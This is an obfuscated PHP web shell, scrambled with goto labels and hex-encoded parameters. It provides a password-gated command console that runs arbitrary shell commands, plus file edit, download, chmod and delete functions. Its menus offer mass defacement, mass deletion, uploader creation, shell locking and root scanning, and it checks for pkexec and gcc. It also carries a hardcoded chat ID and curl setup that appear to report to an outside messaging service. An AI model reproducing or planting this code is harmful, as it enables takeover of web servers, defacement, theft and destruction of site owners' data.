\303\242\342\x80\223\302\xac User-Agent : [ " . $user_agent . " ]"; goto pX8l8; ak3P1: i2lyR: goto k_zrx; D2W59: function changeFilePermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); foreach ($iterator as $item) { if ($item->isFile()) { chmod($item->getPathname(), $perms); } } } goto nuhVX; pYVJI: gu3kV: goto NFI9A; Y7KPr: qmsSx: goto L4_mp; Ccdo0: lKeYb: goto H_nCu; dqQaX: OuGP1: goto qqZ23; Ihp18: set_time_limit(0); goto huEAZ; g0WyW: function unhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } goto KYCG3; kza90: goto KhULb; goto ST4JP; wQyvE: yn5Pk: goto IFtzp; TQyOY: goto g_RKq; goto VVNqs; fq2I4: $sql = $GLOBALS["fungsi"][5]("mysql_connect") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto IwR8N; qVaIQ: goto HLgyN; goto WycuD; MvvYi: goto Ob__b; goto cK2rs; syHtm: goto r40jO; goto tbtc1; qM7Rx: idbRV: goto SMgdl; JbRyv: r40jO: goto PPrH1; KYCG3: goto Tbopv; goto iYc1l; jikb3: goto M3BqJ; goto H2Pi7; BP1qv: goto S88LA; goto cGdUr; CPPBu: if ($_7["action"] == "chmod_folder") { s(); $FolderChmod = substr(sprintf("%o", fileperms($dir)), -4); function chmod_folder($dir, $permissions) { if (is_dir($dir)) { if (chmod($dir, octdec($permissions))) { return true; } else { return false; } } else { return false; } } if ($_7["yeah"]) { $permissions = $_7["permissions"]; if (chmod_folder($dir, $permissions)) { echo "<strong>Chmod folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Chmod folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } echo "\xa\x9		<div class='btn-group mb-3'>\xa				<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa	\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa	\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>\xa\x9\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa\x9		</div>
	\x9	<div class='card card-body text-dark input-group mb-3'><p>Set permissions for : " . basename($dir) . "</p>\xa\x9		\x9<form method='POST'>
\x9	\x9\x9	<input type='text' name='permissions' value='{$FolderChmod}' required>\xa		\x9		<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>Cancel</a>\xa	\x9\x9		<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Set Permissions'>
				</form>\xa\x9		</div>"; } goto twjlG; I8bMz: goto QnGHN; goto JbRyv; vKDMF: $disfunc = @ini_get("disable_functions"); goto jGADS; n8j2h: $correctPassword = "domba"; goto U3NfY; tcING: goto L40lb; goto QbLd2; dyu0A: function ia() { $ia = ''; if (getenv("HTTP_CLIENT_IP")) { $ia = getenv("HTTP_CLIENT_IP"); } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $ia = getenv("HTTP_X_FORWARDED_FOR"); } else { if (getenv("HTTP_X_FORWARDED")) { $ia = getenv("HTTP_X_FORWARDED"); } else { if (getenv("HTTP_FORWARDED_FOR")) { $ia = getenv("HTTP_FORWARDED_FOR"); } else { if (getenv("HTTP_FORWARDED")) { $ia = getenv("HTTP_FORWARDED"); } else { if (getenv("REMOTE_ADDR")) { $ia = getenv("REMOTE_ADDR"); } else { $ia = "Unknown IP."; } } } } } } return $ia; } goto jikb3; awheV: DB5uf: goto y9uy4; jhqTu: goto E53fJ; goto DFo23; VVNqs: xq51K: goto t_mQ0; VB_Zh: goto yn5Pk; goto k4dIj; ZLWhF: goto HgnMn; goto G0rig; UZCd7: K2OD0: goto oPun5; otufx: goto n0uKs; goto U6VA6; oSuaD: function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } goto a61L1; B2JgX: if ($_7["action"] == "edit") { s(); echo "\xa\x9\x9<div class='btn-group'>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>
	\x9</div>\xa\x9	<br>
\x9		<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . "\xa	\x9</br>\xa	\x9<form method='POST'>
\x9\x9\x9<textarea class='form-control btn-sm' rows='15' name='contents' {$_r}>" . htmlspecialchars($fungsi[0]($file)) . "</textarea>
\x9	\x9<div class='d-grid gap-2'>\xa\x9\x9\x9<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button>
			</div>\xa		</form>"; } goto syHtm; Pso6J: goto FkKSL; goto BUTIn; UwA0N: error_reporting(0); goto xQEXE; mB2Mf: fYypx: goto EoJs0; JaGks: goto lsV5N; goto g85JD; HlE6K: goto V3aam; goto yn2Tx; pJIHO: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "<rd>ON</rd>" : "<gr>OFF</gr>"; goto Tyt1q; vVelv: function changeFolderPermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); foreach ($iterator as $item) { if ($item->isDir()) { chmod($item->getPathname(), $perms); } } } goto bPxnv; pLTwC: goto q1vD_; goto ygzyS; M_Q9a: Rc8_b: goto QdZhC; Njg7s: MSTMF: goto rnVAT; JfxNK: goto wmm9T; goto Niw5_; xk9iT: if ($_7["action"] == "rename_folder") { if ($_7["r_d"]) { $r_d = rename($dir, '' . dirname($dir) . "/" . htmlspecialchars($_7["r_d"]) . ''); if ($r_d) { echo "<strong>Rename folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Rename folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } s(); echo "\xa\x9	<div class='btn-group'>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa	\x9</div>\xa\x9\x9<br>\xa\x9	\x9<i class='bi bi-folder-fill'></i>:&nbsp;" . basename($dir) . "
\x9	</br>\xa\x9	<form method='POST'>
			<div class='input-group'>
		\x9	<input class='form-control btn-sm' type='text' value='" . basename($dir) . "' name='r_d' {$_r}>
	\x9\x9\x9<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>
	\x9\x9</div>
\x9\x9</form>"; } goto IIg7D; ygzyS: svZje: goto uLPNS; hogqD: if (isset($_7["dirnew"])) { s(); if (isset($_7["create"])) { $name = $_7["name_dir"]; foreach ($name as $name_dir) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir); $fd = @mkdir($folder); } if ($fd) { echo "<script>window.location='?path=" . hex($path) . "'</script>"; } else { echo "<strong>Create dir</strong> fail! " . er() . "</div>"; } } echo "
	\x9<div class='mb-3'>
\x9		<form method='POST'>\xa		\x9\x9<i class='bi bi-folder'></i> Name directory:
\x9\x9\x9	<div class='input-group mb-3'>
\x9	\x9	\x9<input class='form-control form-control-sm' type='text' name='name_dir[]' placeholder='Dir name' {$_r}>
			\x9\x9<input class='btn btn-outline-light btn-sm' type='submit' name='create' value='create dir'>\xa	\x9		</div>
\x9\x9\x9</form>\xa	\x9</div>"; } goto BGEv7; ljtbs: A6NGf: goto qK5rB; hyWxJ: goto I1rhv; goto MbUDf; nEeZx: goto A6NGf; goto fAweN; cK2rs: QnGHN: goto k4sSD; UuSuo: adv1G: goto bKjHY; REB1u: if ($_7["action"] == "chmod") { s(); $fileToChmod = $file; $currentChmod = fileperms($fileToChmod); $FileChmod = substr(sprintf("%o", $currentChmod), -4); if (isset($_POST["cehamot"])) { if (isset($_7["new_chmod"])) { $newChmod = $_7["new_chmod"]; $newChmodOctal = octdec($newChmod); if (is_numeric($newChmod)) { if (chmod($fileToChmod, $newChmodOctal)) { echo "<strong>Chmod file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Chmod file</strong> fail! " . er() . "</div>"; } } else { echo "<strong>Check Chmod Value</strong> fail! " . er() . "</div>"; } } } echo "\xa\x9	<div class='btn-group'>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>
	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>
		</div>\xa\x9\x9<br>
\x9\x9<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . "
	\x9</br>
\x9\x9<form method='POST'>
\x9		<div class='input-group'>
			\x9<input class='form-control btn-sm' type='text' name='new_chmod' value='{$FileChmod}'><button class='btn btn-outline-light btn-sm' type='submit' name='cehamot'><i class='bi bi-arrow-return-right'></i></button>
		\x9</div>
\x9\x9</form>"; } goto TQyOY; ZFgRB: KUtnK: goto fq2I4; lfNQy: goto aAe5o; goto dqQaX; i51iK: aWW6H: goto g0WyW; emyW3: goto WQ2ja; goto y5yZj; vYHYh: goto bYTED; goto zmKJM; g4QUG: GIn5m: goto nwitw; uKnpG: $domen = $_SERVER["SERVER_NAME"]; goto qVaIQ; Z2Byx: McCnR: goto QKxFT; upcq7: goto jEqlm; goto L5SY1; nxYqg: @ini_set("log_errors", 0); goto BBEnD; NIMXe: goto If5hf; goto SH6LF; TTnxI: goto ANvpy; goto HJFtS; pY6gl: goto zuGew; goto WSsCt; SGKBz: if (!$GLOBALS["fungsi"][5]("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto yhECU; Msa02: goto H5D0K; goto t2E2c; S5Onc: goto KUtnK; goto nwFWT; Niw5_: L40lb: goto BrKM0; y5yZj: KwLgJ: goto uKnpG; JsI0e: HLgyN: goto zsOiR; EOe4J: goto fYypx; goto pNXU3; CChkk: oKwUZ: goto aY1lk; aWagg: KmVW5: goto CPPBu; IPiVI: goto y6Y_L; goto eW7Zp; L8iNG: goto s7SaO; goto UW4lC; iZFXr: goto vQdCF; goto zZOvt; rW9GQ: goto KmVW5; goto v_KJh; xQEXE: goto T0L1a; goto Uy2Ph; YyM5i: goto rPurp; goto Q8GKs; ZrHOp: d2xQL: goto eCIsx; KFLyg: goto Jm_Qb; goto WkiLV; U6VA6: C1bTU: goto boRyc; I8XLB: $gcw = "getcwd"; goto MvvYi; zN3tu: RXoFU: goto iF5O8; m_lQ1: goto RXkre; goto O8WKF; ne7no: echo "&nbsp;[ " . w($path, p($path)) . " ]"; goto S5Onc; q0gSw: goto aKeCl; goto m31q9; CLzcZ: I1rhv: goto R5vvF; NcwTG: fBRrX: goto UwA0N; OYSHy: goto SwU8B; goto ywaqh; gjAoI: goto C1bTU; goto M9GSH; fxMqf: goto nGILA; goto SgzDb; wduFL: goto jy7fd; goto ezQTk; R5vvF: header("X-XSS-Protection: 0"); goto nDMp2; IeY8l: if (isset($_7["left"])) { session_start(); session_destroy(); echo "<script>window.location="" . $_SERVER["PHP_SELF"] . "";</script>"; } goto hYe9r; A8SxU: IAa_h: goto pJIHO; axbi8: rISkk: goto XMFJS; IFtzp: $scdir = explode("/", $dir); goto cOq2q; nuhVX: goto EGOzL; goto JsI0e; jSAwj: goto wDzwC; goto goYyD; n9cie: goto HfHct; goto UuSuo; cGdUr: wDzwC: goto ORaqL; qqZ23: $hitung_array = count($Array); goto I8bMz; Ql4_q: $ch = curl_init(); goto K6D6_; jXYO1: $scand = scandir($path); goto c6a2h; nDMp2: goto lKeYb; goto dLv3E; NFI9A: $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto rh9KY; eCIsx: $pxex = exe("pkexec --version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto qAMhz; SgzDb: RXkre: goto W3XcD; lbxMx: goto oKwUZ; goto RicPt; XTWbw: echo "
	\x9<div class='container-fluid'>
		\x9<div class='corner anu py-3'>
			\x9<button class='btn btn-outline-light btn-sm' data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'>
\x9\x9		<i class='bi bi-info-circle'></i> info <i class='bi bi-chevron-down'></i>\xa\x9	\x9\x9</button>
		\x9</div>
	\x9	<div class='collapse text-dark mb-3' id='collapseExample'>\xa\x9\x9\x9\x9<div class='box shadow bg-light p-3 rounded-3'>
		\x9	System: <gr>{$kernel}</gr><br>\xa		\x9\x9User: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br>
\x9\x9	\x9PHP Version: <gr>{$phpver}</gr> PHP os: <gr>{$phpos}</gr><br>\xa\x9\x9	\x9Software: <gr>{$soft}</gr><br>\xa		\x9	Domain: <gr>{$domen}</gr><br>
		\x9\x9Server Ip: <gr>{$ip}</gr><br>
	\x9	\x9Your Ip: <gr>{$yip}</gr><br>\xa	\x9\x9\x9City: <gr>{$city}</gr><br>
\x9\x9		Safe Mode: {$sm}<br>\xa		\x9	MySQL: {$sql} | Perl: {$pl} | WGET: {$wget} | CURL: {$curl} | Python: {$py} | Pkexec: {$pxex} | GCC: {$gcc}<br>\xa\x9	\x9\x9Disable Function:<br><pre>{$disfc}</pre>\xa	\x9		</div>
	\x9	</div>
			\x9</div>\xa	\x9	\x9<div class='text-center'>\xa\x9\x9	<div class='btn-group'>
\x9\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=upload'><i class='bi bi-upload'></i> Upload</a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=uploadvialink'><i class='bi bi-upload'></i> Upload Via Link</a>
	\x9	</div>\xa	\x9\x9<div class='btn-group'>
		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass deface</a>
			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=delete'><i class='bi bi-trash'></i> Mass delete</a>
\x9		</div>
\x9		<div class='btn-group'>\xa\x9	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=network'><i class='bi bi-hdd-network'></i> Network</a>\xa\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=cmd'><i class='bi bi-terminal'></i> Console</a>
	\x9\x9</div>
\x9	\x9<div class='btn-group'>
\x9	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=lockshell'><i class='bi bi-file-earmark-lock'></i> Lock Shell</a>
	\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=unlockshell'><i class='bi bi-file-earmark'></i> Unlock Shell</a>
		\x9</div>
\x9\x9	<div class='btn-group'>\xa\x9\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=phpmailer'><i class='bi bi-envelope'></i> PHP Mailer</a>\xa		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=searchbyEXT'><i class='bi bi-braces'></i> Search By EXT</a>
\x9\x9\x9</div><br><br>
	\x9	<div class='btn-group'>
		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=createhates'><i class='bi bi-file-earmark-plus'></i> Create Htaccess</a>
		\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=createuploader'><i class='bi bi-file-earmark-plus'></i> Create Uploader</a>\xa	\x9\x9</div>\xa	\x9	<div class='btn-group'>
\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=root_file'><i class='bi bi-file-earmark'></i> Green All File</a>\xa		\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=root_folders'><i class='bi bi-folder'></i> Green All Folders</a>\xa\x9	\x9</div>\xa		\x9<div class='btn-group'>\xa\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=dark_file'><i class='bi bi-file-earmark-lock'></i> Lock All File</a>\xa		\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=dark_folders'><i class='bi bi-folder-x'></i> Lock All Folders</a></div>
		\x9<div class='btn-group'>\xa			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&id=scan_root'><i class='bi bi-search'></i> Scan root</a>
			</div>
			<div class='btn-group'>
		\x9	<a class='btn btn-outline-light btn-sm' href='?logout=true'><i class='bi bi-box-arrow-in-left'></i> Logout</a>\xa		\x9</div>
		</div>"; goto tdhtT; rnVAT: function ok() { echo "<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto YyM5i; RharQ: lRnUM: goto SGKBz; uxESJ: cmB2X: goto sV8KT; YX2r_: goto Gm74y; goto apWbg; SnFRN: header("Content-Type: text/html; charset=UTF-8"); goto xhFtK; dJHtg: s_cq9: goto u1Gp4; fAweN: HfHct: goto IeY8l; YdWhL: $chatId = "5571531961"; goto Wn18T; BEYcg: goto PkFhD; goto pYVJI; TMPU0: $dir = str_replace("\", "/", $dir); goto VB_Zh; H7C5X: KOMIS: goto nHank; KZprX: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto FEDzx; AfB8N: function s() { echo "<style>table{display:none;}</style><div class="table-responsive"><hr></div>"; } goto sC6rm; twjlG: goto rISkk; goto H7C5X; qMxX4: lhjuO: goto SnFRN; Y_ZUF: goto d2xQL; goto D6fdE; aZblL: $yip = $_SERVER["REMOTE_ADDR"]; goto Pso6J; G14V6: goto nWNfK; goto no2rs; DFo23: OY_it: goto FEUrJ; fP29U: $py = exe("python --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto Y_ZUF; EBffy: goto eo8KT; goto qM7Rx; Tyt1q: goto SoWRM; goto Cx1VN; tbtc1: HgnMn: goto wYXrr; NIcgu: if (isset($_GET["id"]) && $_GET["id"] === "dark_file") { $newFilePermissions = 292; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } goto lfNQy; UW4lC: pvj3a: goto MFdHq; osecG: goto KzNHr; goto toPda; G0rig: KmDAz: goto B2JgX; U3NfY: goto tiJmV; goto axbi8; cNchv: kAEUT: goto G3vw5; pIeXA: if (isset($_7["opn"]) && $_7["opn"] != '' && $_7["action"] == "download") { @ob_clean(); $file = $_7["opn"]; header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto OYSHy; Z5_Jj: goto RXoFU; goto bvDAd; ddA3e: goto KwLgJ; goto EHvWy; BUTIn: Jm_Qb: goto MBmU1; xJU6c: $paths = explode("/", $path); goto FcjTk; AT4g5: d9Nwk: goto TaKsn; nI5xl: if ($_7["id"] == "cmd") { s(); $cmdResult = ''; $command = ''; if (!empty($_POST["cmd"])) { $command = htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8"); $cmdResult = shell_exec($command . " 2>&1"); if ($cmdResult === null) { $output = array(); $return_var = 0; exec($command, $output, $return_var); $cmdResult = implode("\xa", $output); if ($cmdResult === null) { $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($command, $descriptorspec, $pipes); if (is_resource($process)) { $cmdResult = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); $return_value = proc_close($process); if ($return_value !== 0) { $cmdResult = "Error: Non-zero return value ({$return_value})"; } } else { $cmdResult = "Error: Failed to open process with proc_open"; } } } } echo "
\x9		<div class='mb-3'>
		\x9	<form method='POST'>\xa\x9	\x9\x9<div class='input-group d-flex gap-2'>
\x9			<label for='cmd'>{$user}@{$domen}: ~ $</label>\xa				</div>
\x9\x9	\x9\x9<div class='input-group mb-3'>\xa	\x9\x9	\x9	<input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "' placeholder='whoami' {$_r}>\xa		\x9	\x9	<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\xa	\x9\x9		</div>\xa		\x9\x9</form>"; if (!empty($cmdResult)) { echo "
			\x9<div class='container-fluid language-javascript'>
	\x9\x9\x9	<div class='shell mb-3'>
		\x9\x9		<pre style='font-size:10px;'><gr>~</gr>$&nbsp;<rd>{$command}</rd><br><code>" . htmlspecialchars($cmdResult, ENT_QUOTES, "UTF-8") . "</code></pre>\xa\x9		\x9	</div>\xa		\x9	</div>"; } elseif ($_SERVER["REQUEST_METHOD"] == "POST") { echo "
	\x9\x9	<div class='container-fluid language-javascript'>\xa	\x9		\x9<div class='shell mb-3'>
	\x9	\x9	\x9<pre style='font-size:10px;'><code>No result</code></pre>\xa		\x9		</div>
\x9		\x9</div>
		\x9</div>"; } } goto bFGp_; L5SY1: FkKSL: goto Qdp7W; Xtayd: function sz($byt) { $typ = array("B", "KB", "MB", "GB", "TB"); for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . " " . $typ[$i]; } goto XGHY4; dLv3E: bYTED: goto jXYO1; iLBez: goto iYskO; goto WszL8; zF6Wn: goto C9DqF; goto iI08Z; Mdw2u: goto d9Nwk; goto wQyvE; C9c37: TUS18: goto NIcgu; boq4M: $data = json_decode($response, true); goto eavUF; ywaqh: ZT_p6: goto sBdeq; dqJ0W: E53fJ: goto e4Pf2; FcjTk: goto cmB2X; goto c9WMJ; XqS3f: goto pvj3a; goto r3kFk; BrKM0: set_time_limit(0); goto H0PkX; SMgdl: echo "\xa	\x9<div class="table-responsive">\xa\x9	<table class="table table-hover table-dark text-light">\xa	\x9<thead>
\x9\x9<tr>\xa\x9		<td class="text-center">name</td><td class="text-center">type</td>
\x9	\x9\x9<td class="text-center">last edit</td>
		\x9	<td class="text-center">size</td>\xa\x9\x9\x9\x9<td class="text-center">owner<gr>/</gr>group</td>\xa		\x9	<td class="text-center">permision</td>\xa\x9	\x9<td class="text-center">action</td>\xa\x9	</tr>
\x9	</thead>
\x9	<tbody class="text-nowrap">
\x9\x9<tr>\xa\x9\x9	<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?dir=" . dirname($dir) . "">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">\xa\x9\x9\x9\x9<div class="btn-group">\xa	\x9\x9		<a class="btn btn-outline-light btn-sm" href="?filenew&path=" . $dir . ""><i class="bi bi-file-earmark-plus-fill"></i></a>\xa					<a class="btn btn-outline-light btn-sm" href="?dirnew&path=" . $dir . ""><i class="bi bi-folder-plus"></i></a>
\x9\x9\x9\x9</div>
\x9		</td>\xa\x9	</tr>"; goto o0h0r; Wn18T: goto HD1QB; goto gBg7t; sV8KT: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=" . hex("/") . "'>/</a>"; continue; } if ($pat == '') { continue; } echo "<a class='text-decoration-none' href='?path="; for ($i = 0; $i <= $id; $i++) { echo hex($paths[$i]); if ($i != $id) { echo hex("/"); } } echo "'>" . $pat . "</a>/"; } goto L8iNG; K6D6_: goto XBCqU; goto XtGrk; W3XcD: if ($_7["action"] == "view") { s(); echo "\xa		<div class='btn-group'>
	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>
	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>
	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>
	\x9</div>\xa\x9	<br>
			<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . "\xa	\x9</br>
\x9\x9<div class='bg-dark'>\xa			<div class='container-fluid language-javascript'>
\x9\x9	\x9<textarea rows='15' class='form-control' disabled=''>" . htmlspecialchars($fungsi[0]($file)) . "</textarea>\xa\x9\x9	</div>\xa	\x9</div>"; } goto G6W2I; y9uy4: if (isset($_GET["dir"]) && $_GET["id"] == "scan_root") { ob_implicit_flush(); ob_end_flush(); s(); echo "\xa\x9	\x9<div class='text-center'>
